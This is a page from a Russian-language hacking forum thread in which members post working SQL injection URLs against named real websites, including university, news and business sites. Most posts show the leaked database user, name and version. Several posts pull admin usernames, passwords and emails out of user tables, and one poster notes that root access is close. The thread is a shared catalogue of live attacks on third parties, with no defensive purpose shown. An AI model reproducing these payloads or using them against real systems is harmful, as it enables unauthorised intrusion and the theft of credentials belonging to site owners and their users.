SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Code:
    http://www.goudengravure.nl/goudengravure.php?ac=module&module=aanbod&id=-1 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11 from information_schema.tables limit 0,1+--+
    
    User: [email protected]
    Database: db005893_goude000
    Version: 5.0.87-d10-ourdelta65-byte3+bytelenny1-log

    Code:
    http://www.mace.manchester.ac.uk/postgraduate/research/projects/description/?id=-1+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+125,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
    User: [email protected]
    Database: pip
    Version: 5.1.34-1-log

    Code:
    http://www.acllf.org/album.php?type=centre&id=-1%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4++
    User: acllf@localhost
    Database: acllf
    Version: 5.0.51a-3ubuntu5.5

    Code:
    http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29x%20GROUP%20BY%20CONCAT%28user%28%29,%20FLOOR%28RAND%280%29*2%29%29%29%20--
    User: [email protected]
    Database: aresazi
    Version: 5.0.51a-3ubuntu5.5
     
    #12061 b82a, 14 May 2010
    Last edited: 14 May 2010
    1 person likes this.
  2. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    вот очередная порция инъешек от меня=))
    Вам осталось приложить немного усилий до получения полного рута...=))

    П.С. Логины и пароли в открытом виде не выкладываю, кому надо, тот сам скопипастит линки в адрес=)

    В основном сайты в зоне .edu

    seafmd-rcu.oie.int
    Code:
    http://www.seafmd-rcu.oie.int/news.php?articleID=-65+union+select+concat(username,0x20,password),2,3,4,5+from+users+limit+4,1--
    uselessjunk.com
    Code:
    http://www.uselessjunk.com/article_full.php?id=-13199+union+select+1,2,fld_password,4,5,6+from+tbl_admin--+

    harrisburgu.edu
    Code:
    http://www.harrisburgu.edu/news/article.php?id=-610+and+1=2+union+select+1,concat(username,0x20,password),3,4+from+users+limit+3,1--
    stnersess.edu
    Code:
    http://www.stnersess.edu/news/detail.php?id=-260+union+select+1,2,3,4,5,6,concat(password,0x20,userid),8+from+users--
    mbc.edu
    Code:
    http://www.mbc.edu/news/r_detail.php?id=-1947+union+select+concat(Username,0x20,Password),2,3,4,5,6,7,8+from+tbladmin--
    llk.media.mit.edu
    Code:
    http://llk.media.mit.edu/spotlight.php?id=-3+union+select+concat(User,0x20,Password),2,3,4,5+from+mysql.user--
     
    3 people like this.
  3. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    Code:
    http://www.vostokagro.ru/content.php?id=90+and+(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,database(),version(),user())),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
    Database: u18876_3
    Version: 5.0.88-log
    User: [email protected]
    PR: 3
    ТИЦ: 120

    Code:
    http://www.redicecreations.com/article.php?id=7381'+and+(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,database(),version(),user())),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
    Database: redicecreations
    Version: 5.0.32-Debian_7etch11-log
    User: redicecreations@srv48.
    PR: 5
    ТИЦ: 10
     
    1 person likes this.
  4. Lasteeck

    Lasteeck *ersguterjunge*

    Joined:
    5 Apr 2010
    Messages:
    172
    Likes Received:
    109
    Reputations:
    6
    http://www.legovaz.spb.ru

    Code:
    http://www.legovaz.spb.ru/photogallery/photo.php?id=100+and+1=0+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5--
    User: [email protected]
    Database: wwwlegovazru_spb
    Version: 4.1.25-log

    ТИЦ 10
    ПР 1
     
    #12064 Lasteeck, 15 May 2010
    Last edited: 15 May 2010
  5. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.supervolos.ru/index1.php?t=-1+union+select+1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5,6,7,8+--
    version : 5.0.54
    user : z262240_igoruser@localhost
    database : z262240_svolos
    os : pc-linux-gnu
     
  6. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Code:
    http://www.gdchivast.com/index.php?f=rendiandongtai&ac=read&id=-1%20UNION%20SELECT%201,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13+--+
    Version: 4.1.20
    Database: gdchivast
    User: gdchivast_f@localhost
     
  7. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.samaranews.ru/

    Code:
    http://www.samaranews.ru/catalog/art/art.php?art=-1+and+1=2+union+select+1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6+--
    version : 5.0.51a-community-nt-log
    user : [email protected]
    database : gb_samnews
    os : Win64
     
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://historywired.si.edu/object.cfm?ID=-1' or 1=@@version
     
    2 people like this.
  9. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Code:
    http://www.soldesk-itacademy.co.kr/community/sub5_01.php?boardgubun=view&code=itbank_notice&page=1&id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,10,11,12,13,14,15,16,17,18,19,20%20--+
    User: ksheco@localhost
    Database: ksheco
    Version: 4.0.20
     
    3 people like this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://gates.fr/europe/email/index.cfm?e_type=friend_brochure&ID=(select+top+1+password+from+users)

    OS: Windows NT 5.2 (Build 3790: Service Pack 2)
    MSSQL_version: Microsoft SQL Server 2005 - 9.00.4053.00 (X64)
     
    _________________________
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://classes.dma.ucla.edu/Spring05/157A/cursos/157A/index_visor.php?id=1&ejercicio_id=9&persona_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8+--+
     
  12. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Code:
    http://www.sraad.com/print.php?id=-1%20UNION%20SELECt%201,2,3,4,5,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20--+
    User: jaymack@localhost
    Database: sraad
    Version: 4.1.12a-nt
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.lelombard.com/Agenda/Detail.cfm?query_id=(select+top+1+table_name+from+information_schema.columns+where+column_name=CHAR(112)%2bchar(97)%2bchar(115)%2bchar(115)%2bchar(119)%2bchar(111)%2bchar(114)%2bchar(100))--

    OS: Windows NT 5.0 (Build 2195: Service Pack 4)
    DB_VERSION:Microsoft SQL Server 2000 - 8.00.818 (Intel X86)
     
    _________________________
    1 person likes this.
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.prioninstitute.ca/index.php?page=webpages&menucat=24+and+(select+1+from+(select+count(0),concat((select+concat(id,0x3a,username,0x3a,password,0x3a,email)+from+admin_users+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--&id=17&action=displaypage&side=1
     
    1 person likes this.
  15. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.alpharent.gr/gr/news.php?id=1+union+/*!select+1,2,concat(0x7c,user_id,0x7c,user_login,0x7c,user_password,0x7c,user_name,0x7c,user_email,0x7c),4+from+users*/--
     
  16. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.keyin.ca/news.asp?id=-52+union+%73%65%6C%65%63%74+1,2,3,concat(uId,0x3a,0x3a,uFullName,0x3a,0x3a,uEmail,0x3a,0x3a,uPassword),5+FROM+tb_users+LIMIT+0,1%23&news=showall
     
  17. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Code:
    http://web1321.anna.webhoster.ag/detail.php?id=-1%20UNION%20SELECT%201,2,3,4,5,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,7,8,9,10,11,12,13,14,15%20--+
    User: web1321@localhost
    Database: usr_web1321_1
    Version: 5.0.77
     
  18. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Федерация Бодибилдинга и Фитнеса России

    Code:
    http://www.fbfr.ru/index.php?lan=ru&cont=news&id=-287+and+1=2+union+select+1,2,3,4,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),6,7+--
    version : 4.1.22-max
    user : whbody1@localhost
    database : whbody1
    os : unknown-freebsd6.0
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.vino-concept.ch/content.php?id=-189+UNION+SELECT+1,2,3,concat(user(),char(58),version(),char(58),database()),5
     
    _________________________
  20. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    Code:
    http://www.slicedgaming.com/blogs.php?staff_id=5 UNION ALL SELECT 1,%String_Col%,3,4,5--
    Host IP: 67.205.52.7
    Web Server: Apache
    Powered-by: PHP/5.2.13
    DB Server: MySQL >=5
    Current DB: slicedgaming
     
    1 person likes this.
Thread Status:
Not open for further replies.